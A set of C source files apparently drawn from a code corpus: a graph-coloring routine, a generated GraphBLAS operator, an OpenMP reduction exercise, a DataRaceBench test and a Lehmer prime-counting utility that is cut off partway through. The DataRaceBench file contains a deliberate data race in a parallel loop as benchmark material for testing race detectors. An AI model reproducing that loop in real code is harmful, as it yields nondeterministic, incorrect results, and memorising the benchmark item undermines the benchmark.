//neighbor_j = graph.edgessrcdst[graph.psrc[node] + j];
neighbor_j = csrColInd[neighboroffset + j];
if (coloring[node] == coloring[neighbor_j] && node < neighbor_j) {
//printf("c[%d] = c[%d] = %d\n", node, neighbor_j, coloring[node]);
outwl.push(node);
break;
}
}
//if (j == neighbors)
//printf("%d ok\tcolor[%d]=%d\n", node, node, coloring[node]);
}
}
void findMax(int *coloring, int n, int *ncolors) {
int i;
for (i = 0; i < n; i++) {
//printf("coloring[%d]=%d\n", i, coloring[i]);
if (coloring[i] > *ncolors)
*ncolors = coloring[i];
}
}
void color(int m, int nnz, int *csrRowPtr, int *csrColInd, int *ncolors, int *coloring)
{
Worklist inwl, outwl, *inwlptr, *outwlptr, *tmp;
double starttime, endtime;
double runtime;
//int nnodes = graph.nnodes;
inwl.ensureSpace(m);
outwl.ensureSpace(m);
inwlptr = &inwl;
outwlptr = &outwl;
unsigned *range;
range = (unsigned *)malloc(m * sizeof(unsigned));
for (unsigned i = 0; i < m; i++)
range[i] = i;
//inwl.pushRange(graph.srcsrc, nnodes);
inwl.pushRange(range, m);
int iteration = 0;
unsigned wlsz = inwl.getSize();
//printf("wlsz=%d, outwl=%d\n", wlsz, outwl.getSize());
//printf("solving.\n");
starttime = rtclock();
#ifdef ENABLE_OPENMP
while (wlsz) {
++iteration;
#endif
//FirstFit(graph, *inwlptr, coloring);
FirstFit(m, nnz, csrRowPtr, csrColInd, *inwlptr, coloring);
#ifdef ENABLE_OPENMP
__syncthreads();
//printf("ok\n");
//conflictDetect(graph, *inwlptr, *outwlptr, coloring);
conflictDetect(m, nnz, csrRowPtr, csrColInd, *inwlptr, *outwlptr, coloring);
__syncthreads();
//printf("ok\n");
//printf("iteration %d:inwl=%d, outwl=%d\n", iteration, wlsz, outwlptr->getSize());
wlsz = outwlptr->getSize();
tmp = inwlptr; inwlptr = outwlptr; outwlptr = tmp;
outwlptr->clear();
}
#endif
endtime = rtclock();
//verify<<<(nnodes - 1) / 1024 + 1, 1024>>>(graph, coloring, correct);
//CUDA_SAFE_CALL(cudaDeviceSynchronize());
//if (*correct) {
//findMax<<<(nnodes - 1) / 1024 + 1, 1024>>>(coloring, nnodes, ncolors);
findMax(coloring, m, ncolors);
//CUDA_SAFE_CALL(cudaDeviceSynchronize());
//}
runtime = (1000.0f * (endtime - starttime));
printf("runtime=%f\tcolors=%d\t", runtime, *ncolors);
}
|
GB_unaryop__ainv_uint64_int8.c | //------------------------------------------------------------------------------
// GB_unaryop: hard-coded functions for each built-in unary operator
//------------------------------------------------------------------------------
// SuiteSparse:GraphBLAS, Timothy A. Davis, (c) 2017-2019, All Rights Reserved.
// http://suitesparse.com See GraphBLAS/Doc/License.txt for license.
//------------------------------------------------------------------------------
// If this file is in the Generated/ folder, do not edit it (auto-generated).
#include "GB.h"
#ifndef GBCOMPACT
#include "GB_control.h"
#include "GB_iterator.h"
#include "GB_unaryop__include.h"
// C=unop(A) is defined by the following types and operators:
// op(A) function: GB_unop__ainv_uint64_int8
// op(A') function: GB_tran__ainv_uint64_int8
// C type: uint64_t
// A type: int8_t
// cast: uint64_t cij = (uint64_t) aij
// unaryop: cij = -aij
#define GB_ATYPE \
int8_t
#define GB_CTYPE \
uint64_t
// aij = Ax [pA]
#define GB_GETA(aij,Ax,pA) \
int8_t aij = Ax [pA]
#define GB_CX(p) Cx [p]
// unary operator
#define GB_OP(z, x) \
z = -x ;
// casting
#define GB_CASTING(z, x) \
uint64_t z = (uint64_t) x ;
// cij = op (cast (aij))
#define GB_CAST_OP(pC,pA) \
{ \
/* aij = Ax [pA] */ \
GB_GETA (aij, Ax, pA) ; \
/* Cx [pC] = op (cast (aij)) */ \
GB_CASTING (x, aij) ; \
GB_OP (GB_CX (pC), x) ; \
}
// disable this operator and use the generic case if these conditions hold
#define GB_DISABLE \
(GxB_NO_AINV || GxB_NO_UINT64 || GxB_NO_INT8)
//------------------------------------------------------------------------------
// Cx = op (cast (Ax)): apply a unary operator
//------------------------------------------------------------------------------
GrB_Info GB_unop__ainv_uint64_int8
(
uint64_t *restrict Cx,
const int8_t *restrict Ax,
int64_t anz,
int nthreads
)
{
#if GB_DISABLE
return (GrB_NO_VALUE) ;
#else
#pragma omp parallel for num_threads(nthreads) schedule(static)
for (int64_t p = 0 ; p < anz ; p++)
{
GB_CAST_OP (p, p) ;
}
return (GrB_SUCCESS) ;
#endif
}
//------------------------------------------------------------------------------
// C = op (cast (A')): transpose, typecast, and apply a unary operator
//------------------------------------------------------------------------------
GrB_Info GB_tran__ainv_uint64_int8
(
GrB_Matrix C,
const GrB_Matrix A,
int64_t **Rowcounts,
GBI_single_iterator Iter,
const int64_t *restrict A_slice,
int naslice
)
{
#if GB_DISABLE
return (GrB_NO_VALUE) ;
#else
#define GB_PHASE_2_OF_2
#include "GB_unaryop_transpose.c"
return (GrB_SUCCESS) ;
#endif
}
#endif
|
reduction-clauseModificado7.c | #include <stdio.h>
#include <stdlib.h>
#ifdef _OPENMP
#include <omp.h>
#else
#define omp_get_thread_num() 0
#endif
int main(int argc, char **argv) {
int i, n=20, a[n],suma=0;
if(argc < 2){
fprintf(stderr,"Falta iteraciones\n");
exit(-1);
}
n = atoi(argv[1]); if(n>20) {n=20; printf("n=%d",n);}
for(i=0;i<n;i++) a[i]=i;
#pragma omp parallel private(i) reduction(+:suma)
{
for(i=omp_get_thread_num();i<n;i+=omp_get_num_threads()){
suma += a[i];
printf("\nthread %d suma a[%d] y suma vale: %d ", omp_get_thread_num(), i,suma);
}
}
printf("\nTras 'parallel' suma=%d\n",suma);
}
|
DRB002-antidep1-var-yes.c | /*
Copyright (c) 2017, Lawrence Livermore National Security, LLC.
Produced at the Lawrence Livermore National Laboratory
Written by Chunhua Liao, Pei-Hung Lin, Joshua Asplund,
Markus Schordan, and Ian Karlin
(email: liao6@llnl.gov, lin32@llnl.gov, asplund1@llnl.gov,
schordan1@llnl.gov, karlin1@llnl.gov)
LLNL-CODE-732144
All rights reserved.
This file is part of DataRaceBench. For details, see
https://github.com/LLNL/dataracebench. Please also see the LICENSE file
for our additional BSD notice.
Redistribution and use in source and binary forms, with
or without modification, are permitted provided that the following
conditions are met:
* Redistributions of source code must retain the above copyright
notice, this list of conditions and the disclaimer below.
* Redistributions in binary form must reproduce the above copyright
notice, this list of conditions and the disclaimer (as noted below)
in the documentation and/or other materials provided with the
distribution.
* Neither the name of the LLNS/LLNL nor the names of its contributors
may be used to endorse or promote products derived from this
software without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND
CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES,
INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF
MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
DISCLAIMED. IN NO EVENT SHALL LAWRENCE LIVERMORE NATIONAL
SECURITY, LLC, THE U.S. DEPARTMENT OF ENERGY OR CONTRIBUTORS BE
LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,
OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING
IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF
THE POSSIBILITY OF SUCH DAMAGE.
*/
/*
A loop with loop-carried anti-dependence.
Data race pair: a[i+1]@67:10 vs. a[i]@67:5
*/
#include <stdlib.h>
int main(int argc, char* argv[])
{
int i;
int len = 1000;
if (argc>1)
len = atoi(argv[1]);
int a[len];
for (i=0; i<len; i++)
a[i]= i;
#pragma omp parallel for schedule(dynamic)
for (i=0;i< len -1 ;i++)
a[i]=a[i+1]+1;
return 0;
}
|
lehmer.c | #if defined(LEHMER) || defined(PRIMESIEVE_STANDALONE)
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <math.h>
/*****************************************************************************
*
* Lehmer prime counting utility. Calculates pi(x), count of primes <= x.
*
* Copyright (c) 2012-2013 Dana Jacobsen (dana@acm.org).
* This is free software; you can redistribute it and/or modify it under
* the same terms as the Perl 5 programming language system itself.
*
* This file is part of the Math::Prime::Util Perl module, but also can be
* compiled as a standalone UNIX program using primesieve 5.x.
*
* g++ -O3 -DPRIMESIEVE_STANDALONE lehmer.c -o prime_count -lprimesieve
*
* The phi(x,a) calculation is unique, to the best of my knowledge. It uses
* two lists of all x values + signed counts for the given 'a' value, and walks
* 'a' down until it is small enough to calculate directly using a table.
* This is relatively fast and low memory compared to many other solutions.
* As with all Lehmer-Meissel-Legendre algorithms, memory use will be a
* constraint with large values of x.
*
* Math::Prime::Util now includes an extended LMO implementation, which will
* be quite a bit faster and much less memory than this code. It is the
* default method for large counts. Timing comparisons are in that file.
*
* Times and memory use for prime_count(10^15) on a Haswell 4770K, asterisk
* indicates parallel operation. The standalone versions of my code use
* Kim Walisch's excellent primesieve, which is faster than my sieve.
* His Lehmer/Meissel/Legendre seem a bit slower in serial, but
* parallelize much better.
*
* 4.74s 1.3MB LMO
* 24.53s* 137.9MB Lehmer Walisch primecount v0.9, 8 threads
* 38.74s* 150.3MB LMOS Walisch primecount v0.9, 8 threads
* 42.52s* 159.4MB Lehmer standalone, 8 threads
* 42.82s* 137.9MB Meissel Walisch primecount v0.9, 8 threads
* 51.88s 153.9MB LMOS standalone, 1 thread
* 52.01s* 145.5MB Legendre Walisch primecount v0.9, 8 threads
* 64.96s 160.3MB Lehmer standalone, 1 thread
* 67.16s 67.0MB LMOS
* 80.42s 286.6MB Meissel
* 99.70s 159.6MB Lehmer
* 107.43s 28.5MB Lehmer Walisch primecount v0.9, 1 thread
* 174.51s 83.5MB Legendre
* 185.11s 25.6MB LMOS Walisch primecount v0.9, 1 thread
* 191.19s 24.8MB Meissel Walisch primecount v0.9, 1 thread
* 868.96s 1668.1MB Lehmer pix4 by T.R. Nicely
*
* Reference: Hans Riesel, "Prime Numbers and Computer Methods for
* Factorization", 2nd edition, 1994.
*/
/* Below this size, just sieve (with table speedup). */
#define SIEVE_LIMIT 60000000
#define MAX_PHI_MEM (896*1024*1024)
static int const verbose = 0;
#define STAGE_TIMING 0
#if STAGE_TIMING
#include <sys/time.h>
#define DECLARE_TIMING_VARIABLES struct timeval t0, t1;
#define TIMING_START gettimeofday(&t0, 0);
#define TIMING_END_PRINT(text) \
{ unsigned long long t; \
gettimeofday(&t1, 0); \
t = (t1.tv_sec-t0.tv_sec) * 1000000 + (t1.tv_usec - t0.tv_usec); \
printf("%s: %10.5f\n", text, ((double)t) / 1000000); }
#else
#define DECLARE_TIMING_VARIABLES
#define TIMING_START
#define TIMING_END_PRINT(text)
#endif
#ifdef PRIMESIEVE_STANDALONE
/* countPrimes can be pretty slow for small ranges, so sieve more small primes
* and count using binary search. Uses a lot of memory though. For big
* ranges, countPrimes is really fast. If you use primesieve 4.2, the
* crossover point is lower (better). */
#define SIEVE_MULT 10
/* Translations from Perl + Math::Prime::Util to C/C++ + primesieve */
typedef unsigned long UV;
typedef signed long IV;
#define UV_MAX ULONG_MAX
#define UVCONST(x) ((unsigned long)x##UL)
#define New(id, mem, size, type) mem = (type*) malloc((size)*sizeof(type))
#define Newz(id, mem, size, type) mem = (type*) calloc(size, sizeof(type))
#define Renew(mem, size, type) mem = (type*) realloc(mem,(size)*sizeof(type))
#define Safefree(mem) free((void*)mem)
#define croak(fmt,...) { printf(fmt,##__VA_ARGS__); exit(1); }
#define prime_precalc(n) /* */
#define BITS_PER_WORD ((ULONG_MAX <= 4294967295UL) ? 32 : 64)
static UV isqrt(UV n) {
UV root;
if (sizeof(UV) == 8 && n >= 18446744065119617025UL) return 4294967295UL;
if (sizeof(UV) == 4 && n >= 4294836225UL) return 65535UL;
root = (UV) sqrt((double)n);
while (root*root > n) root--;
while ((root+1)*(root+1) <= n) root++;
return root;
}
static UV icbrt(UV n) {
UV b, root = 0;
int s;
if (sizeof(UV) == 8) {
s = 63; if (n >= 18446724184312856125UL) return 2642245UL;
} else {
s = 30; if (n >= 4291015625UL) return 1625UL;
}
for ( ; s >= 0; s -= 3) {
root += root;
b = 3*root*(root+1)+1;
if ((n >> s) >= b) {
n -= b << s;
root++;
}
}
return root;
}
/* Use version 5.x of PrimeSieve */
#include <limits.h>
#include <sys/time.h>
#include <primesieve.hpp>
#include <vector>
#ifdef _OPENMP
#include <omp.h>
#endif
#define _XS_prime_count(a, b) primesieve::parallel_count_primes(a, b)
/* Generate an array of n small primes, where the kth prime is element p[k].
* Remember to free when done. */
#define TINY_PRIME_SIZE 20000
static uint32_t* tiny_primes = 0;
static uint32_t* generate_small_primes(UV n)
{
uint32_t* primes;
New(0, primes, n+1, uint32_t);
if (n < TINY_PRIME_SIZE) {
if (tiny_primes == 0)
tiny_primes = generate_small_primes(TINY_PRIME_SIZE+1);
memcpy(primes, tiny_primes, (n+1) * sizeof(uint32_t));
return primes;
}
primes[0] = 0;
{
std::vector<uint32_t> v;
primesieve::generate_n_primes(n, &v);
memcpy(primes+1, &v[0], n * sizeof(uint32_t));
}
return primes;
}
#else
/* We will use pre-sieving to speed up counting for small ranges */
#define SIEVE_MULT 1
#define FUNC_isqrt 1
#define FUNC_icbrt 1
#include "lehmer.h"
#include "util.h"
#include "cache.h"
#include "sieve.h"
/* Generate an array of n small primes, where the kth prime is element p[k].
* Remember to free when done. */
static uint32_t* generate_small_primes(UV n)
{
uint32_t* primes;
UV i = 0;
double fn = (double)n;
double flogn = log(fn);
double flog2n = log(flogn);
UV nth_prime = /* Dusart 2010 for > 179k, custom for 18-179k */
(n >= 688383) ? (UV) ceil(fn*(flogn+flog2n-1.0+((flog2n-2.00)/flogn))) :
(n >= 178974) ? (UV) ceil(fn*(flogn+flog2n-1.0+((flog2n-1.95)/flogn))) :
(n >= 18) ? (UV) ceil(fn*(flogn+flog2n-1.0+((flog2n+0.30)/flogn)))
: 59;
if (n > 203280221)
croak("generate small primes with argument too large: %lu\n", (unsigned long)n);
New(0, primes, n+1, uint32_t);
primes[0] = 0;
START_DO_FOR_EACH_PRIME(2, nth_prime) {
if (i >= n) break;
primes[++i] = p;
} END_DO_FOR_EACH_PRIME
if (i < n)
croak("Did not generate enough small primes.\n");
if (verbose > 1) printf("generated %lu small primes, from 2 to %lu\n", i, (unsigned long)primes[i]);
return primes;
}
#endif
/* Given an array of primes[1..lastprime], return Pi(n) where n <= lastprime.
* This is actually quite fast, and definitely faster than sieving. By using
* this we can avoid caching prime counts and also skip most calls to the
* segment siever.
*/
static UV bs_prime_count(uint32_t n, uint32_t const* const primes, uint32_t lastidx)
{
UV i, j;
if (n <= 2) return (n == 2);
/* If n is out of range, we could:
* 1. return _XS_prime_count(2, n);
* 2. if (n == primes[lastidx]) return lastidx else croak("bspc range");
* 3. if (n >= primes[lastidx]) return lastidx;
*/
if (n >= primes[lastidx]) return lastidx;
j = lastidx;
if (n < 8480) {
i = 1 + (n>>4);
if (j > 1060) j = 1060;
} else if (n < 25875000) {
i = 793 + (n>>5);
if (j > (n>>3)) j = n>>3;
} else {
i = 1617183;
if (j > (n>>4)) j = n>>4;
}
while (i < j) {
UV mid = i + (j-i)/2;
if (primes[mid] <= n) i = mid+1;
else j = mid;
}
/* if (i-1 != _XS_prime_count(2, n)) croak("wrong count for %lu: %lu vs. %lu\n", n, i-1, _XS_prime_count(2, n)); */
return i-1;
}
#define FAST_DIV(x,y) \
( ((x) <= 4294967295U) ? (uint32_t)(x)/(uint32_t)(y) : (x)/(y) )
/* static uint32_t sprime[] = {0,2, 3, 5, 7, 11, 13, 17, 19, 23}; */
/* static uint32_t sprimorial[] = {1,2,6,30,210,2310,30030,510510}; */
/* static uint32_t stotient[] = {1,1,2, 8, 48, 480, 5760, 92160}; */
static const uint16_t _s0[ 1] = {0};
static const uint16_t _s1[ 2] = {0,1};
static const uint16_t _s2[ 6] = {0,1,1,1,1,2};
static const uint16_t _s3[30] = {0,1,1,1,1,1,1,2,2,2,2,3,3,4,4,4,4,5,5,6,6,6,6,7,7,7,7,7,7,8};
static uint16_t _s4[210];
static uint16_t _s5[2310];
static uint16_t _s6[30030];
static const uint16_t* sphicache[7] = { _s0,_s1,_s2,_s3,_s4,_s5,_s6 };
static int sphi_init = 0;
#define PHIC 7
static UV tablephi(UV x, uint32_t a) {
switch (a) {
case 0: return x;
case 1: return x-x/2;
case 2: return x-x/2-x/3+x/6;
case 3: return (x/ 30U) * 8U + sphicache[3][x % 30U];
case 4: return (x/ 210U) * 48U + sphicache[4][x % 210U];
case 5: return (x/ 2310U) * 480U + sphicache[5][x % 2310U];
case 6: return (x/ 30030U) * 5760U + sphicache[6][x % 30030U];
#if PHIC >= 7
case 7: {
UV xp = x / 17U;
return ((x /30030U) * 5760U + sphicache[6][x % 30030U]) -
((xp/30030U) * 5760U + sphicache[6][xp % 30030U]);
}
#endif
#if PHIC >= 8
case 8: {
UV xp = x / 17U;
UV x2 = x / 19U;
UV x2p = x2 / 17U;
return ((x /30030U) * 5760U + sphicache[6][x % 30030U]) -
((xp /30030U) * 5760U + sphicache[6][xp % 30030U]) -
((x2 /30030U) * 5760U + sphicache[6][x2 % 30030U]) +
((x2p/30030U) * 5760U + sphicache[6][x2p% 30030U]);
}
#endif
default: croak("a %u too large for tablephi\n", a);
}
}
static void phitableinit(void) {
if (sphi_init == 0) {
int x;
for (x = 0; x < 210; x++)
_s4[x] = ((x/ 30)* 8+_s3[x% 30])-(((x/ 7)/ 30)* 8+_s3[(x/ 7)% 30]);
for (x = 0; x < 2310; x++)
_s5[x] = ((x/ 210)* 48+_s4[x% 210])-(((x/11)/ 210)* 48+_s4[(x/11)% 210]);
for (x = 0; x < 30030; x++)
_s6[x] = ((x/2310)*480+_s5[x%2310])-(((x/13)/2310)*480+_s5[(x/13)%2310]);
sphi_init = 1;
}
}
/* Max memory = 2*X*A bytes, e.g. 2*65536*256 = 32 MB */
#define PHICACHEA 512
#define PHICACHEX 65536
typedef struct
{
uint32_t max[PHICACHEA];
int16_t* val[PHICACHEA];
} cache_t;
static void phicache_init(cache_t* cache) {
int a;
for (a = 0; a < PHICACHEA; a++) {
cache->val[a] = 0;
cache->max[a] = 0;
}
phitableinit();
}
static void phicache_free(cache_t* cache) {
int a;
for (a = 0; a < PHICACHEA; a++) {
if (cache->val[a] != 0)
Safefree(cache->val[a]);
cache->val[a] = 0;
cache->max[a] = 0;
}
}
#define PHI_CACHE_POPULATED(x, a) \
((a) < PHICACHEA && (UV) cache->max[a] > (x) && cache->val[a][x] != 0)
static void phi_cache_insert(uint32_t x, uint32_t a, IV sum, cache_t* cache) {
uint32_t cap = ( (x+32) >> 5) << 5;
/* If sum is too large for the cache, just ignore it. */
if (sum < SHRT_MIN || sum > SHRT_MAX) return;
if (cache->val[a] == 0) {
Newz(0, cache->val[a], cap, int16_t);
cache->max[a] = cap;
} else if (cache->max[a] < cap) {
uint32_t i;
Renew(cache->val[a], cap, int16_t);
for (i = cache->max[a]; i < cap; i++)
cache->val[a][i] = 0;
cache->max[a] = cap;
}
cache->val[a][x] = (int16_t) sum;
}
static IV _phi3(UV x, UV a, int sign, const uint32_t* const primes, const uint32_t lastidx, cache_t* cache)
{
IV sum;
if (a <= 1)
return sign * ((a == 0) ? x : x-x/2);
else if (PHI_CACHE_POPULATED(x, a))
return sign * cache->val[a][x];
else if (a <= PHIC)
sum = sign * tablephi(x,a);
else if (x < primes[a+1])
sum = sign;
else if (x <= primes[lastidx] && x < primes[a+1]*primes[a+1])
sum = sign * (bs_prime_count(x, primes, lastidx) - a + 1);
else {
UV a2, iters = (a*a > x) ? bs_prime_count( isqrt(x), primes, a) : a;
UV c = (iters > PHIC) ? PHIC : iters;
IV phixc = PHI_CACHE_POPULATED(x, c) ? cache->val[c][x] : (IV)tablephi(x,c);
sum = sign * (iters - a + phixc);
for (a2 = c+1; a2 <= iters; a2++)
sum += _phi3(FAST_DIV(x,primes[a2]), a2-1, -sign, primes, lastidx, cache);
}
if (a < PHICACHEA && x < PHICACHEX)
phi_cache_insert(x, a, sign * sum, cache);
return sum;
}
#define phi_small(x, a, primes, lastidx, cache) _phi3(x, a, 1, primes, lastidx, cache)
/******************************************************************************/
/* In-order lists for manipulating our UV value / IV count pairs */
/******************************************************************************/
typedef struct {
UV v;
IV c;
} vc_t;
typedef struct {
vc_t* a;
UV size;
UV n;
} vcarray_t;
static vcarray_t vcarray_create(void)
{
vcarray_t l;
l.a = 0;
l.size = 0;
l.n = 0;
return l;
}
static void vcarray_destroy(vcarray_t* l)
{
if (l->a != 0) {
if (verbose > 2) printf("FREE list %p\n", l->a);
Safefree(l->a);
}
l->size = 0;
l->n = 0;
}
/* Insert a value/count pair. We do this indirection because about 80% of
* the calls result in a merge with the previous entry. */
static void vcarray_insert(vcarray_t* l, UV val, IV count)
{
UV n = l->n;
if (n > 0 && l->a[n-1].v < val)
croak("Previous value was %lu, inserting %lu out of order\n", l->a[n-1].v, val);
if (n >= l->size) {
UV new_size;
if (l->size == 0) {
new_size = 20000;
if (verbose>2) printf("ALLOCing list, size %lu (%luk)\n", new_size, new_size*sizeof(vc_t)/1024);
New(0, l->a, new_size, vc_t);
} else {
new_size = (UV) (1.5 * l->size);
if (verbose>2) printf("REALLOCing list %p, new size %lu (%luk)\n",l->a,new_size, new_size*sizeof(vc_t)/1024);
Renew( l->a, new_size, vc_t );
}
l->size = new_size;
}
/* printf(" inserting %lu %ld\n", val, count); */
l->a[n].v = val;
l->a[n].c = count;
l->n++;
}
/* Merge the two sorted lists A and B into A. Each list has no duplicates,
* but they may have duplications between the two. We're quite interested
* in saving memory, so first remove all the duplicates, then do an in-place
* merge. */
static void vcarray_merge(vcarray_t* a, vcarray_t* b)
{
long ai, bi, bj, k, kn;
long an = a->n;
long bn = b->n;
vc_t* aa = a->a;
vc_t* ba = b->a;
/* Merge anything in B that appears in A. */
for (ai = 0, bi = 0, bj = 0; bi < bn; bi++) {
UV bval = ba[bi].v;
/* Skip forward in A until empty or aa[ai].v <= ba[bi].v */
while (ai+8 < an && aa[ai+8].v > bval) ai += 8;
while (ai < an && aa[ai ].v > bval) ai++;
/* if A empty then copy the remaining elements */
if (ai >= an) {
if (bi == bj)
bj = bn;
else
while (bi < bn)
ba[bj++] = ba[bi++];
break;
}
if (aa[ai].v == bval)
aa[ai].c += ba[bi].c;
else
ba[bj++] = ba[bi];
}
if (verbose>3) printf(" removed %lu duplicates from b\n", bn - bj);
bn = bj;
if (bn == 0) { /* In case they were all duplicates */
b->n = 0;
return;
}
/* kn = the final merged size. All duplicates are gone, so this is exact. */
kn = an+bn;
if ((long)a->size < kn) { /* Make A big enough to hold kn elements */
UV new_size = (UV) (1.2 * kn);
if (verbose>2) printf("REALLOCing list %p, new size %lu (%luk)\n", a->a, new_size, new_size*sizeof(vc_t)/1024);
Renew( a->a, new_size, vc_t );
aa = a->a; /* this could have been changed by the realloc */
a->size = new_size;
}
/* merge A and B. Very simple using reverse merge. */
ai = an-1;
bi = bn-1;
for (k = kn-1; k >= 0 && bi >= 0; k--) {
UV bval = ba[bi].v;
long startai = ai;
while (ai >= 15 && aa[ai-15].v < bval) ai -= 16;
while (ai >= 3 && aa[ai- 3].v < bval) ai -= 4;
while (ai >= 0 && aa[ai ].v < bval) ai--;
if (startai > ai) {
k = k - (startai - ai) + 1;
memmove(aa+k, aa+ai+1, (startai-ai) * sizeof(vc_t));
} else {
if (ai >= 0 && aa[ai].v == bval) croak("deduplication error");
aa[k] = ba[bi--];
}
}
a->n = kn; /* A now has this many items */
b->n = 0; /* B is marked empty */
}
static void vcarray_remove_zeros(vcarray_t* a)
{
long ai = 0;
long aj = 0;
long an = a->n;
vc_t* aa = a->a;
while (aj < an) {
if (aa[aj].c != 0) {
if (ai != aj)
aa[ai] = aa[aj];
ai++;
}
aj++;
}
a->n = ai;
}
/*
* The main phi(x,a) algorithm. In this implementation, it takes under 10%
* of the total time for the Lehmer algorithm, but is a big memory consumer.
*/
#define NTHRESH (MAX_PHI_MEM/16)
static UV phi(UV x, UV a)
{
UV i, val, sval, lastidx, lastprime;
UV sum = 0;
IV count;
const uint32_t* primes;
vcarray_t a1, a2;
vc_t* arr;
cache_t pcache; /* Cache for recursive phi */
phitableinit();
if (a == 1) return ((x+1)/2);
if (a <= PHIC) return tablephi(x, a);
lastidx = a+1;
primes = generate_small_primes(lastidx);
lastprime = primes[lastidx];
if (x < lastprime) { Safefree(primes); return (x > 0) ? 1 : 0; }
phicache_init(&pcache);
a1 = vcarray_create();
a2 = vcarray_create();
vcarray_insert(&a1, x, 1);
while (a > PHIC) {
UV primea = primes[a];
UV sval_last = 0;
IV sval_count = 0;
arr = a1.a;
for (i = 0; i < a1.n; i++) {
count = arr[i].c;
val = arr[i].v;
sval = FAST_DIV(val, primea);
if (sval < primea) break; /* stop inserting into a2 if small */
if (sval != sval_last) { /* non-merged value. Insert into a2 */
if (sval_last != 0) {
if (sval_last <= lastprime && sval_last < primes[a-1]*primes[a-1])
sum += sval_count*(bs_prime_count(sval_last,primes,lastidx)-a+2);
else
vcarray_insert(&a2, sval_last, sval_count);
}
sval_last = sval;
sval_count = 0;
}
sval_count -= count; /* Accumulate count for this sval */
}
if (sval_last != 0) { /* Insert the last sval */
if (sval_last <= lastprime && sval_last < primes[a-1]*primes[a-1])
sum += sval_count*(bs_prime_count(sval_last,primes,lastidx)-a+2);
else
vcarray_insert(&a2, sval_last, sval_count);
}
/* For each small sval, add up the counts */
for ( ; i < a1.n; i++)
sum -= arr[i].c;
/* Merge a1 and a2 into a1. a2 will be emptied. */
vcarray_merge(&a1, &a2);
/* If we've grown too large, use recursive phi to clip. */
if ( a1.n > NTHRESH ) {
arr = a1.a;
if (verbose > 0) printf("clipping small values at a=%lu a1.n=%lu \n", a, a1.n);
#ifdef _OPENMP
/* #pragma omp parallel for reduction(+: sum) firstprivate(pcache) schedule(dynamic, 16) */
#endif
for (i = 0; i < a1.n-NTHRESH+NTHRESH/50; i++) {
UV j = a1.n - 1 - i;
IV count = arr[j].c;
if (count != 0) {
sum += count * phi_small( arr[j].v, a-1, primes, lastidx, &pcache );
arr[j].c = 0;
}
}
}
vcarray_remove_zeros(&a1);
a--;
}
phicache_free(&pcache);
vcarray_destroy(&a2);
arr = a1.a;
#ifdef _OPENMP
#pragma omp parallel for reduction(+: sum) schedule(dynamic, 16)
#endif
for (i = 0; i < a1.n; i++)
sum += arr[i].c * tablephi( arr[i].v, PHIC );
vcarray_destroy(&a1);
Safefree(primes);
return (UV) sum;
}
extern UV _XS_meissel_pi(UV n);
/* b = prime_count(isqrt(n)) */
static UV Pk_2_p(UV n, UV a, UV b, const uint32_t* primes, uint32_t lastidx)
{
UV lastw, lastwpc, i, P2;
UV lastpc = primes[lastidx];
/* Ensure we have a large enough base sieve */
prime_precalc(isqrt(n / primes[a+1]));
P2 = lastw = lastwpc = 0;
for (i = b; i > a; i--) {
UV w = n / primes[i];
lastwpc = (w <= lastpc) ? bs_prime_count(w, primes, lastidx)
: lastwpc + _XS_prime_count(lastw+1, w);
lastw = w;
P2 += lastwpc;
}
P2 -= ((b+a-2) * (b-a+1) / 2) - a + 1;
return P2;
}
static UV Pk_2(UV n, UV a, UV b)
{
UV lastprime = ((b*3+1) > 203280221) ? 203280221 : b*3+1;
const uint32_t* primes = generate_small_primes(lastprime);
UV P2 = Pk_2_p(n, a, b, primes, lastprime);
Safefree(primes);
return P2;
}
/* Legendre's method. Interesting and a good test for phi(x,a), but Lehmer's
* method is much faster (Legendre: a = pi(n^.5), Lehmer: a = pi(n^.25)) */
UV _XS_legendre_pi(UV n)
{
UV a, phina;
if (n < SIEVE_LIMIT)
return _XS_prime_count(2, n);
a = _XS_legendre_pi(isqrt(n));
/* phina = phi(n, a); */
{ /* The small phi routine is faster for large a */
cache_t pcache;
const uint32_t* primes = 0;
primes = generate_small_primes(a+1);
phicache_init(&pcache);
phina = phi_small(n, a, primes, a+1, &pcache);
phicache_free(&pcache);
Safefree(primes);
}
return phina + a - 1;
}
/* Meissel's method. */
UV _XS_meissel_pi(UV n)
{
UV a, b, sum;
if (n < SIEVE_LIMIT)
return _XS_prime_count(2, n);
a = _XS_meissel_pi(icbrt(n)); /* a = Pi(floor(n^1/3)) [max 192725] */
b = _XS_meissel_pi(isqrt(n)); /* b = Pi(floor(n^1/2)) [max 203280221] */
sum = phi(n, a) + a - 1 - Pk_2(n, a, b);
return sum;
}
/* Lehmer's method. This is basically Riesel's Lehmer function (page 22),
* with some additional code to help optimize it. */
UV _XS_lehmer_pi(UV n)
{
UV z, a, b, c, sum, i, j, lastprime, lastpc, lastw, lastwpc;
const uint32_t* primes = 0; /* small prime cache, first b=pi(z)=pi(sqrt(n)) */
DECLARE_TIMING_VARIABLES;
if (n < SIEVE_LIMIT)
return _XS_prime_count(2, n);
/* Protect against overflow. 2^32-1 and 2^64-1 are both divisible by 3. */
if (n == UV_MAX) {
if ( (n%3) == 0 || (n%5) == 0 || (n%7) == 0 || (n%31) == 0 )
n--;
else
return _XS_prime_count(2,n);
}
if (verbose > 0) printf("lehmer %lu stage 1: calculate a,b,c \n", n);
TIMING_START;
z = isqrt(n);
a = _XS_lehmer_pi(isqrt(z)); /* a = Pi(floor(n^1/4)) [max 6542] */
b = _XS_lehmer_pi(z); /* b = Pi(floor(n^1/2)) [max 203280221] */
c = _XS_lehmer_pi(icbrt(n)); /* c = Pi(floor(n^1/3)) [max 192725] */
TIMING_END_PRINT("stage 1")
